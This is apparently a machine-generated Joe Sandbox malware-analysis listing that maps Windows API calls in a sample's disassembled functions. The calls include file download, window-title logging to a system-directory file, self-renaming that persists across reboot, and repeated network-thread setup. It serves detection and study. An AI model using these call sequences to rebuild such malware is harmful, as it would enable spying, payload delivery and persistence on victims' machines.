                                                                    • lstrcpy.KERNEL32(?,1001348C), ref: 0040F39C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcpywsprintf
                                                                    • String ID: M$T$a$e$i$k$m$r
                                                                    • API String ID: 993010004-394501062
                                                                    • Opcode ID: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction ID: 806940ddc6176a079b7faf898d6a197000d8fe1ee52352c01640b0c79db0c027
                                                                    • Opcode Fuzzy Hash: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction Fuzzy Hash: 7AF08620D042C8FAEF0297A5CC48BDE7F799F52758F0480E9E95076282C3BA5619C776
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040D929
                                                                    • memset.MSVCRT ref: 0040D947
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041264D
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 00412660
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041266E
                                                                      • Part of subcall function 00412618: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,?,?,?,00000104,00000000), ref: 0041267B
                                                                      • Part of subcall function 00412618: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,00000104,00000000), ref: 00412858
                                                                    • lstrlen.KERNEL32(?), ref: 0040D976
                                                                    • strstr.MSVCRT ref: 0040D98C
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040D99C
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040D9E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
                                                                    • String ID: D
                                                                    • API String ID: 2666049651-2746444292
                                                                    • Opcode ID: 7c43e2881ab051d66cccc48ca481354fe3a72dcd877bbe56901919aa72d22bbf
                                                                    • Instruction ID: c5ced43407b237d6a84c053058033a74fab7f62356e831f2adb2d5d7aa0be0e9
                                                                    • Opcode Fuzzy Hash: 7c43e2881ab051d66cccc48ca481354fe3a72dcd877bbe56901919aa72d22bbf
                                                                    • Instruction Fuzzy Hash: ED2151B2901228EADF209BE1DD49EDF7B7CEF45351F100426FA05F6140DB749689CBA4
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 10008550
                                                                    • malloc.MSVCRT ref: 10008562
                                                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 1000856F
                                                                    • strrchr.MSVCRT ref: 10008577
                                                                    • wsprintfA.USER32 ref: 100085AA
                                                                    • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 100085C0
                                                                      • Part of subcall function 1000A42D: GetFileAttributesA.KERNEL32(00000000,100085D6,00000000,00000000,00000000,00000000,00000000), ref: 1000A431
                                                                      • Part of subcall function 1000A42D: GetLastError.KERNEL32 ref: 1000A43C
                                                                      • Part of subcall function 100083B0: memset.MSVCRT ref: 100083CF
                                                                      • Part of subcall function 100083B0: strrchr.MSVCRT ref: 100083D9
                                                                      • Part of subcall function 100083B0: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000), ref: 100083FA
                                                                      • Part of subcall function 100083B0: RegQueryValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 10008419
                                                                      • Part of subcall function 100083B0: RegCloseKey.ADVAPI32(00000000), ref: 10008424
                                                                      • Part of subcall function 100083B0: memset.MSVCRT ref: 10008434
                                                                      • Part of subcall function 100083B0: wsprintfA.USER32 ref: 1000844C
                                                                      • Part of subcall function 100083B0: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 1000846C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FileOpenmemsetstrrchrwsprintf$AttributesCloseDownloadErrorLastQueryValuemallocmemcpystrlen
                                                                    • String ID: c:\%s
                                                                    • API String ID: 1574582470-3279930864
                                                                    • Opcode ID: 8ab3e71583068a4c1c768449037085d1983ff1e15a6ac1be0df5c1a105e35aae
                                                                    • Instruction ID: 6473a6164af58c6d3f91cf5115bdfd47070c43fd0e80899155e04446fba04174
                                                                    • Opcode Fuzzy Hash: 8ab3e71583068a4c1c768449037085d1983ff1e15a6ac1be0df5c1a105e35aae
                                                                    • Instruction Fuzzy Hash: E81191769006293AFB10D7A49C89FDB7BACEF443D1F140476FB05D1087E774AA858BA4
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10006963
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10006975
                                                                    • strcat.MSVCRT(?,Default,?,10012A68), ref: 10006986
                                                                    • strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 10006997
                                                                    • DeleteFileA.KERNEL32(?), ref: 100069A6
                                                                      • Part of subcall function 10006840: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10006875
                                                                      • Part of subcall function 10006840: strcat.MSVCRT(?,10012A68), ref: 10006887
                                                                      • Part of subcall function 10006840: strcat.MSVCRT(?,Default,?,10012A68), ref: 10006898
                                                                      • Part of subcall function 10006840: strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100068A9
                                                                      • Part of subcall function 10006840: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100068C8
                                                                      • Part of subcall function 10006840: GetFileSize.KERNEL32(00000000,00000000), ref: 100068D9
                                                                      • Part of subcall function 10006840: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100068E2
                                                                      • Part of subcall function 10006840: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 100068F4
                                                                      • Part of subcall function 10006840: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10006914
                                                                      • Part of subcall function 10006840: CloseHandle.KERNEL32(?), ref: 1000691E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: strcat$File$DirectorySystem$??2@??3@CloseCreateDeleteHandleReadSize
                                                                    • String ID: .key$Default
                                                                    • API String ID: 3194684379-1583214558
                                                                    • Opcode ID: 9e19c7fdd1cfe48647b7358740303d42b5314bbbe55335f411ac4c9670a39299
                                                                    • Instruction ID: c47c83d7b4fbd5ea92990ccecd9374cfb4c53fdc13c1ca79624313f50a9dc8fb
                                                                    • Opcode Fuzzy Hash: 9e19c7fdd1cfe48647b7358740303d42b5314bbbe55335f411ac4c9670a39299
                                                                    • Instruction Fuzzy Hash: 380181F5C00259ABEB20EBA0CC8AEC977EDDB15394F140495F384A3045DBB4EAC58BA1
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000104), ref: 10008EFB
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10008F09
                                                                    • GetTickCount.KERNEL32 ref: 10008F0F
                                                                    • wsprintfA.USER32 ref: 10008F29
                                                                    • MoveFileA.KERNEL32(?,?), ref: 10008F40
                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 10008F51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                    • String ID: %s\%d.bak
                                                                    • API String ID: 830686190-2116986511
                                                                    • Opcode ID: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction ID: 9f06803c1ffaaaa31e9d9007a62f372198ec7d6cfd6c9242bac5ba9a813fd8f0
                                                                    • Opcode Fuzzy Hash: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction Fuzzy Hash: 50F091B680022CEBEB109B94CD8DED7777CEB19341F400192F755D2065D674AA94CFA4
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,759183C0,00000000,00000001,?,?,10007E40), ref: 10007369
                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 10007381
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1000738B
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000739F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                    • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                                                                    • API String ID: 2256533930-2522683910
                                                                    • Opcode ID: b70516e81cf4186ba5d59661d6084a7a46ccf6b41fbb9f1c04f2bd3a637fdcb0
                                                                    • Instruction ID: 81c69835b32c9c0caa3ea141d32f12e2a558c1f7320e50515fbff50547cedb70
                                                                    • Opcode Fuzzy Hash: b70516e81cf4186ba5d59661d6084a7a46ccf6b41fbb9f1c04f2bd3a637fdcb0
                                                                    • Instruction Fuzzy Hash: 26F03036900318FBF701D7E5DC88EAF7BACEB856E5B104119FA05A3104DB78EE019670
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemsetstrchrstrcpystrlen
                                                                    • String ID: .
                                                                    • API String ID: 3788969630-248832578
                                                                    • Opcode ID: 3a0c8f5c45e144d5a7da8bcc08520caca3791cf6891c93a572bac5900c4e950d
                                                                    • Instruction ID: 6637a0029c5ccaeeccec9ad34e8858c5a00009970b3987beeab1a41d2f1ef73f
                                                                    • Opcode Fuzzy Hash: 3a0c8f5c45e144d5a7da8bcc08520caca3791cf6891c93a572bac5900c4e950d
                                                                    • Instruction Fuzzy Hash: A5210676800148BFEB12DFA8CC81DDF3BACDF15380F5044B6F9859B146DA70BAC58AA1
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040CAB1
                                                                    • GetForegroundWindow.USER32 ref: 0040CAB9
                                                                    • GetWindowTextA.USER32(00000000,1001517C,00000400), ref: 0040CAC7
                                                                    • lstrlen.KERNEL32(1001517C), ref: 0040CAF8
                                                                    • GetLocalTime.KERNEL32(?), ref: 0040CB06
                                                                    • wsprintfA.USER32 ref: 0040CB37
                                                                      • Part of subcall function 0040C9B3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040C9CB
                                                                      • Part of subcall function 0040C9B3: _mbscat.MSVCRT ref: 0040C9DD
                                                                      • Part of subcall function 0040C9B3: _mbscat.MSVCRT ref: 0040C9EE
                                                                      • Part of subcall function 0040C9B3: _mbscat.MSVCRT ref: 0040C9FF
                                                                      • Part of subcall function 0040C9B3: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0040CA20
                                                                      • Part of subcall function 0040C9B3: GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA2E
                                                                      • Part of subcall function 0040C9B3: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040CA42
                                                                      • Part of subcall function 0040C9B3: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040CA56
                                                                      • Part of subcall function 0040C9B3: WriteFile.KERNEL32(?,00000000,00000000), ref: 0040CA83
                                                                      • Part of subcall function 0040C9B3: CloseHandle.KERNEL32(?), ref: 0040CA8C
                                                                    • memset.MSVCRT ref: 0040CB53
                                                                    • memset.MSVCRT ref: 0040CB5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: File$_mbscatmemset$Window$??2@CloseCreateDirectoryForegroundHandleLocalPointerSizeSystemTextTimeWritelstrlenwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2409623530-0
                                                                    • Opcode ID: f8d6c230f38ba22383612dff5830827d82af052c30f29c99fbce0fb9b8c11198
                                                                    • Instruction ID: 122ea5d9abb08784235b85e3bdf3f70467fc9a5091a7e191da92d6c784d5a478
                                                                    • Opcode Fuzzy Hash: f8d6c230f38ba22383612dff5830827d82af052c30f29c99fbce0fb9b8c11198
                                                                    • Instruction Fuzzy Hash: C82132B190022CFAE7109BA9CD85FEE77BCEB08345F104062F601E6181D6799A848B79
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10004498
                                                                    • gethostbyname.WS2_32(?), ref: 100044A8
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100044C0
                                                                    • inet_ntoa.WS2_32(?), ref: 100044CB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100044D7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004502
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004505
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000042B5,00000000,00000000,00000000), ref: 1000452B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 15fd704f61aedeb598f957a8de6bd2aa3d9d4b812b331b19c91f3ff0da029640
                                                                    • Instruction ID: 14a4f8de758e8180cd59c3add182a1bd5b6b72836b17c2c1dafddc8ebba36152
                                                                    • Opcode Fuzzy Hash: 15fd704f61aedeb598f957a8de6bd2aa3d9d4b812b331b19c91f3ff0da029640
                                                                    • Instruction Fuzzy Hash: 67116DB550025DBFFB009FA4DCC4CAA3BECEB452E57128166F904C6265DB30DD808BA0
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002447
                                                                    • gethostbyname.WS2_32(?), ref: 10002457
                                                                    • memcpy.MSVCRT(?,?,?), ref: 1000246F
                                                                    • inet_ntoa.WS2_32(?), ref: 1000247A
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002486
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100024B1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100024B4
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002182,00000000,00000000,00000000), ref: 100024DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 207dbf6156f7ae9750c0ea949908a0c05f84eaa405de875eb15c3d1023100b21
                                                                    • Instruction ID: 0836e4cfd00ad98093936f376dee9b857ec94783c65231398b13e2a878489041
                                                                    • Opcode Fuzzy Hash: 207dbf6156f7ae9750c0ea949908a0c05f84eaa405de875eb15c3d1023100b21
                                                                    • Instruction Fuzzy Hash: 9E114CB551125DBFFB009FA4DCC4CAB7BECEB452E47128125F909C6265DB30DD808BA0
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002588
                                                                    • gethostbyname.WS2_32(?), ref: 10002598
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100025B0
                                                                    • inet_ntoa.WS2_32(?), ref: 100025BB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100025C7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100025F2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100025F5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000024EB,00000000,00000000,00000000), ref: 1000261B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: a20b5c5aa59c1b7a6321889774c18a137dc56c09a8d48e34c438cb1db4a4545e
                                                                    • Instruction ID: b1e4198e81bfd14cfa6f4f13ef54cf70b0541512587501247ef1c7faa2b0750c
                                                                    • Opcode Fuzzy Hash: a20b5c5aa59c1b7a6321889774c18a137dc56c09a8d48e34c438cb1db4a4545e
                                                                    • Instruction Fuzzy Hash: F5113AB550125DBFFB009F64DCC4CAA3BECEB452E97168525F909C6265DB31ED808B60
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002993
                                                                    • gethostbyname.WS2_32(?), ref: 100029A3
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100029BB
                                                                    • inet_ntoa.WS2_32(?), ref: 100029C6
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100029D2
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100029FD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10002A00
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000262C,00000000,00000000,00000000), ref: 10002A26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 73946dd1ed635aaed5d9fc3eba51c00ca56951c10eba8772daa6a168a1d4be54
                                                                    • Instruction ID: f2d2ae79ef2310ba39c191fe81277ec11656710e91ca79f84affb2153a851795
                                                                    • Opcode Fuzzy Hash: 73946dd1ed635aaed5d9fc3eba51c00ca56951c10eba8772daa6a168a1d4be54
                                                                    • Instruction Fuzzy Hash: BF1128B5500259BFFB00EFA4DCC4CAA7BECEB452E47168126F909C6265DB31DD808AA0
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10004211
                                                                    • gethostbyname.WS2_32(?), ref: 10004221
                                                                    • memcpy.MSVCRT(?,?,?), ref: 10004239
                                                                    • inet_ntoa.WS2_32(?), ref: 10004244
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10004250
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000427B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000427E
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003F3F,00000000,00000000,00000000), ref: 100042A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: a44a375f6a8b32d37d3c03423036b1d324b3c4b26bf052f3683a838cedc6308e
                                                                    • Instruction ID: 7a775bfb32ac43c14abc640d24b1e613131a7944075001317151d0b1adf055ba
                                                                    • Opcode Fuzzy Hash: a44a375f6a8b32d37d3c03423036b1d324b3c4b26bf052f3683a838cedc6308e
                                                                    • Instruction Fuzzy Hash: 43113AB5501259BFFB009FA4DCC4CAA3BECEB452E47528125F908C6265DB30ED808BA0
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002447
                                                                    • gethostbyname.WS2_32(?), ref: 10002457
                                                                    • memcpy.MSVCRT(?,?,?), ref: 1000246F
                                                                    • inet_ntoa.WS2_32(?), ref: 1000247A
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002486
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100024B1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100024B4
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002182,00000000,00000000,00000000), ref: 100024DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 3a3526ed159d7f5ac779b0d573e5ebaa7c8c2fb1ced333f1a1d30844a41c343d
                                                                    • Instruction ID: 3cd5014a03220cdb8a973b1951cb30bd2a6bc50cce7a351b1078e88735e0dbb8
                                                                    • Opcode Fuzzy Hash: 3a3526ed159d7f5ac779b0d573e5ebaa7c8c2fb1ced333f1a1d30844a41c343d
                                                                    • Instruction Fuzzy Hash: 241148B551125DBFFB009FA4DCC4CAA7BECEB452E47128125F909C6265DB30ED808BA0
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10003E5E
                                                                    • gethostbyname.WS2_32(?), ref: 10003E6E
                                                                    • memcpy.MSVCRT(?,?,?), ref: 10003E86
                                                                    • inet_ntoa.WS2_32(?), ref: 10003E91
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10003E9D
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003EC8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003ECB
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003C1C,00000000,00000000,00000000), ref: 10003EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: e2b85ed8c11d759cc47533073b6a14df5c76b3f864717abf25221df46cf5fb2b
                                                                    • Instruction ID: fcce369f2235ded2d9048499b47ce3f3240e151dc24d88ed4d2a802bd4162794
                                                                    • Opcode Fuzzy Hash: e2b85ed8c11d759cc47533073b6a14df5c76b3f864717abf25221df46cf5fb2b
                                                                    • Instruction Fuzzy Hash: D71128B550029DBFFB019F64DCC4CAB7BECEB452E47118125F905C62A5DB71ED808B60
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10004498
                                                                    • gethostbyname.WS2_32(?), ref: 100044A8
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100044C0
                                                                    • inet_ntoa.WS2_32(?), ref: 100044CB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100044D7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004502
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004505
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000042B5,00000000,00000000,00000000), ref: 1000452B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 0f4604f025ca16299efcc2b5abd4868c8d69b7b5e1f81785b7c2dfc63795e826
                                                                    • Instruction ID: 152a90106a10d9f6933b557cad83f0a83f019aca5d54440c9d3868692228c9c7
                                                                    • Opcode Fuzzy Hash: 0f4604f025ca16299efcc2b5abd4868c8d69b7b5e1f81785b7c2dfc63795e826
                                                                    • Instruction Fuzzy Hash: 81113DB550125DBFFB009FA4DCC4CAA3BECEB452E57128565F904C6265DB70DD808B60
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 1000470E
                                                                    • gethostbyname.WS2_32(?), ref: 1000471E
                                                                    • memcpy.MSVCRT(?,?,?), ref: 10004736
                                                                    • inet_ntoa.WS2_32(?), ref: 10004741
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 1000474D
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004778
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000477B
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000453C,00000000,00000000,00000000), ref: 100047A1
                                                                    Memory Dump Source
